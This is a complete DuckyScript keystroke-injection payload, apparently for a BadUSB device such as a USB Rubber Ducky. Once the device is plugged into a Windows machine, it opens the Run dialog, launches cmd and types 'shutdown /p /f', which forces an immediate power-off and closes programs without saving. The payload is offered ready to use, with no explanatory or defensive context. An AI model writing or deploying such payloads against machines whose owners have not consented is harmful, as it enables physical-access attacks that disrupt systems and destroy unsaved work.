15 lines
215 B
Plaintext
15 lines
215 B
Plaintext
REM Author: Avaje
|
|
REM Description: Shuts down windows automatically
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 300
|
|
WINDOWS r
|
|
DELAY 300
|
|
STRING cmd
|
|
ENTER
|
|
DELAY 1500
|
|
STRING shutdown /p /f
|
|
ENTER
|